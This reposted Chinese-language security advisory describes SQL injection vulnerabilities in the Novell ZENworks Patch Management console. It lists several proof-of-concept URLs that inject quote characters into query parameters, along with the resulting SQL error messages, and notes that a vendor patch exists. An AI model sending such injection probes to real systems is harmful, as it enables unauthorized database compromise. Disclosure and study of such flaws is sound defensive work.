Novell的ZENworks组件允许组织从SuSE Linux平台管理Windows工作站，Patch Management是其中用于管理补丁的组件。ZENworks Patch Management的管理控制台中存在多个SQL注入漏洞，远程攻击者可以完全入侵基础数据库系统。但如果要利用这个漏洞，管理员应至少手动创建了一个非特权用户帐号。

测试方法：

【警告：以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！】

http://192.168.1.10/computers/default.asp?sort=&Direction=';
Response from server: Incorrect syntax near ', @RecsPerPage=100, @FirstRec=0, @Action=0, 
@Search = ', @groupFilter = '.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]
&Dir=asc&SearchText=';StatusFilter=ERRR&computerFilter=187&impactFilter=29&saveFilter=save
&Page=rep
Response from server: Incorrecy syntax near ', @delimiter='.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]
&Dir=asc&SearchText=CIRT.DK&StatusFilter=';&computerFilter=187&impactFilter=29&saveFilter=
save&Page=rep
Response from server: Incorrect syntax near ', @groupFilter = ', @ImpactFilter = '.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]
&Dir=asc&SearchText=CIRT.DK&StatusFilter=ERRR&computerFilter=';&impactFilter=29&saveFilter
=save&Page=rep
Response from server: Line 1: Incorrect syntax near ', @Contact_ID='.

建议：

厂商补丁：

Novell

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

（出处：清风网络学院）

上一篇:推荐：监控数据库性能的SQL语句汇总

下一篇:用JDBC连接Oracle数据库的十项技巧

Novell ZENworks补丁管理SQL注入漏洞相关文章：

·学生成绩管理系统实习

·IE浏览器再现严重安全漏洞微软紧急发补丁程序

·VB+Access设计图书管理系统

·《暗黑破坏神2》1.10补丁升级详细说明 - 游戏攻略

Novell ZENworks补丁管理SQL注入漏洞相关软件：

·时代光华销售管理课程(1-5)

·学校源码管理系统超靓版V2008

·时代光华-卓越的现场管理 5S推行实务（刘敏欣）(下)

·时代光华－卓越客户管理(11-15)

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员，我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源：http://www.viphot.com

	\| 帮助(？) \| 版权声明 \| 友情连接 \| 关于我们 \| 信息发布
Copyright 2007 www.viphot.com All Rights Reserved.	鄂ICP备05000083号Powered by:viphot